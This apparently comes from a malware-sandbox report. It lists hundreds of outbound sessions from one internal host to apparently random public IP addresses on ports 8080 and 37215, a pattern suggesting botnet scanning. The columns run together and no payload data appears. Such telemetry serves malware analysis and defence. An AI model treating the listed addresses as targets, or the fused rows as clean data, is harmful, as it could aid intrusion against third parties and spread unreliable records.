                                                        22868192.168.2.2359560115.139.165.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22869192.168.2.2341486117.153.57.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22870192.168.2.2351092192.66.165.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22871192.168.2.2354158179.82.183.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22872192.168.2.2353288213.227.139.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22873192.168.2.2344568223.19.214.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22874192.168.2.2344036197.168.25.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22875192.168.2.2360260197.64.97.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22876192.168.2.2342704197.68.74.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22877192.168.2.235956241.21.41.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22878192.168.2.2354888222.78.69.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22879192.168.2.233605641.243.86.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22880192.168.2.2354556157.125.38.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22881192.168.2.235651241.94.230.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22882192.168.2.2359242197.89.94.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22883192.168.2.2351382157.208.48.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22884192.168.2.235855641.55.190.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22885192.168.2.2338464157.102.171.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22886192.168.2.235468880.30.74.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22887192.168.2.2357036197.44.1.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22888192.168.2.2344952157.111.127.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22889192.168.2.2355558157.184.12.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22890192.168.2.2341130157.188.255.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22891192.168.2.2334494179.213.130.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22892192.168.2.2333452197.99.195.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22893192.168.2.2358380197.121.135.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22894192.168.2.2346034157.133.136.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22895192.168.2.2334446197.92.58.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22896192.168.2.234769041.97.1.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22897192.168.2.235166441.227.232.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22898192.168.2.2336346157.195.151.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22899192.168.2.2355296164.65.50.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22900192.168.2.235011043.227.26.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22901192.168.2.2340206197.183.110.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22902192.168.2.234013841.62.21.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22903192.168.2.2345204157.149.135.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22904192.168.2.234085241.25.146.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22905192.168.2.234178041.241.148.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22906192.168.2.2358678157.118.108.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22907192.168.2.236010441.149.96.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22908192.168.2.2345218157.11.254.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22909192.168.2.233634241.138.101.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22910192.168.2.2347568157.155.151.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22911192.168.2.2357612203.220.237.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22912192.168.2.233645441.122.246.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22913192.168.2.2342282157.142.61.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22914192.168.2.233498441.178.125.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22915192.168.2.234244441.15.65.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22916192.168.2.233666841.121.170.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22917192.168.2.2333380157.175.163.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22918192.168.2.2343042197.242.94.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22919192.168.2.234910041.232.136.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22920192.168.2.2345146157.122.150.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22921192.168.2.2345360157.143.237.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22922192.168.2.2359174197.216.219.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22923192.168.2.234579241.108.31.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22924192.168.2.2342324157.217.226.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22925192.168.2.2353212117.125.179.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22926192.168.2.2356736166.34.140.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22927192.168.2.2333942197.24.35.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22928192.168.2.2358382157.99.101.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22929192.168.2.2357542197.252.96.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22930192.168.2.2360026197.147.59.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22931192.168.2.235194020.220.88.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22932192.168.2.2336454197.57.210.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22933192.168.2.2338554178.206.74.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22934192.168.2.2360256197.128.98.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22935192.168.2.233537241.172.108.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22936192.168.2.2350422157.237.196.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22937192.168.2.2350794157.189.34.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22938192.168.2.2339782129.7.106.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22939192.168.2.233799441.145.69.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22940192.168.2.235598876.120.233.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22941192.168.2.235139441.24.32.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22942192.168.2.234137441.13.86.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22943192.168.2.233977241.210.234.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22944192.168.2.2349390157.87.12.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22945192.168.2.2334248157.32.165.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22946192.168.2.23387845.87.27.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22947192.168.2.233417279.204.184.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22948192.168.2.2336548157.230.147.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22949192.168.2.233868841.30.241.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22950192.168.2.2358758143.2.8.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22951192.168.2.2348730157.253.245.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22952192.168.2.2343930157.211.225.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22953192.168.2.235090641.83.20.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22954192.168.2.2355210197.14.116.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22955192.168.2.2343830157.78.199.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22956192.168.2.2344702197.156.213.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22957192.168.2.2344306211.1.25.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22958192.168.2.2343526157.59.53.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22959192.168.2.233741241.103.110.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22960192.168.2.235766234.126.76.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22961192.168.2.2359106197.108.120.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22962192.168.2.2352842197.113.190.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22963192.168.2.2347640197.46.97.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22964192.168.2.235595641.80.255.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22965192.168.2.2351946160.2.221.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22966192.168.2.2358342128.227.92.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22967192.168.2.2337584197.85.104.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22968192.168.2.2346832197.59.203.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22969192.168.2.2359338157.114.23.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22970192.168.2.2347966157.2.123.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22971192.168.2.2360400197.212.156.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22972192.168.2.2344762180.99.9.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22973192.168.2.2343590169.186.184.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22974192.168.2.2349212197.10.173.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22975192.168.2.235174646.177.153.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22976192.168.2.2333848141.212.13.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22977192.168.2.2359168197.91.244.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22978192.168.2.233609041.74.193.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22979192.168.2.2336806197.168.165.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22980192.168.2.2354860131.208.181.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22981192.168.2.2336030157.17.251.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22982192.168.2.2335524197.97.165.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22983192.168.2.233686241.231.83.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22984192.168.2.23540045.221.161.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22985192.168.2.2345288157.201.22.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22986192.168.2.234410841.204.75.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22987192.168.2.2351852157.250.181.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22988192.168.2.2352034157.215.77.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22989192.168.2.233339841.100.11.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22990192.168.2.235566241.0.165.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22991192.168.2.235157254.79.240.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22992192.168.2.2338396134.4.145.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22993192.168.2.2334408157.179.243.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22994192.168.2.234335669.190.206.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22995192.168.2.2343252157.248.75.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22996192.168.2.2359004197.111.175.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22997192.168.2.2344758184.217.166.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22998192.168.2.2353024146.206.242.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22999192.168.2.2333072197.91.39.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23000192.168.2.233855641.18.197.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23001192.168.2.2358396197.6.143.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23002192.168.2.2341350165.174.48.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23003192.168.2.236057691.231.83.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23004192.168.2.2348570197.150.21.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23005192.168.2.233371814.240.119.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23006192.168.2.2348424157.73.244.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23007192.168.2.234569241.203.85.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23008192.168.2.2336856157.147.62.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23009192.168.2.2359056220.131.106.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23010192.168.2.2349962197.243.151.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23011192.168.2.2341358197.177.154.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23012192.168.2.235140690.17.47.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23013192.168.2.2339196192.64.17.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23014192.168.2.2332960197.201.77.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23015192.168.2.2334240197.231.210.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23016192.168.2.234983441.131.83.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23017192.168.2.2358546197.74.244.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23018192.168.2.234404241.203.254.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23019192.168.2.235017627.18.92.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23020192.168.2.2342698197.196.27.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23021192.168.2.2349902157.48.206.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23022192.168.2.235156241.253.126.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23023192.168.2.2360976157.59.90.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23024192.168.2.2349576161.121.53.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23025192.168.2.233403271.56.15.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23026192.168.2.234879012.94.204.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23027192.168.2.2347546184.153.88.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23028192.168.2.235668245.17.173.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23029192.168.2.234741832.101.75.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23030192.168.2.2356100150.160.155.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23031192.168.2.2355626169.102.84.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23032192.168.2.2343690142.85.236.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23033192.168.2.2338698104.6.67.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23034192.168.2.2340458105.214.130.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23035192.168.2.234374091.130.142.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23036192.168.2.2335592199.30.93.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23037192.168.2.234013218.176.244.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23038192.168.2.234386098.174.14.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23039192.168.2.2359482169.198.174.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23040192.168.2.235117289.161.18.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23041192.168.2.233826642.80.171.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23042192.168.2.2351066195.111.255.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23043192.168.2.235818842.27.237.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23044192.168.2.235030458.8.178.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23045192.168.2.2345948179.151.193.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23046192.168.2.2347138192.196.193.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23047192.168.2.2342218155.26.253.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23048192.168.2.2338454175.194.72.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23049192.168.2.234296493.178.95.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23050192.168.2.2353652102.46.4.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23051192.168.2.235574014.244.79.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23052192.168.2.2360254210.199.168.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23053192.168.2.234677679.254.14.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23054192.168.2.234264866.194.152.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23055192.168.2.233777265.189.201.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23056192.168.2.234196682.65.207.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23057192.168.2.2347430199.130.185.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23058192.168.2.2342842139.70.192.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23059192.168.2.234336091.24.237.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23060192.168.2.2349430103.241.65.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23061192.168.2.2344728159.26.220.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23062192.168.2.2352760199.215.174.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23063192.168.2.2347912130.72.139.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23064192.168.2.233494866.103.75.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23065192.168.2.2343000155.3.61.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23066192.168.2.2336448129.97.76.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23067192.168.2.2341554112.228.112.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23068192.168.2.233577082.89.100.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23069192.168.2.2356778182.156.248.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23070192.168.2.2336002181.141.108.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23071192.168.2.2347874200.159.33.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23072192.168.2.2338394217.89.215.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23073192.168.2.233767283.225.217.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23074192.168.2.236015892.238.153.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23075192.168.2.233532252.26.37.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23076192.168.2.2355342175.116.8.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23077192.168.2.233700479.71.123.2238080
                                                        TimestampBytes transferredDirectionData


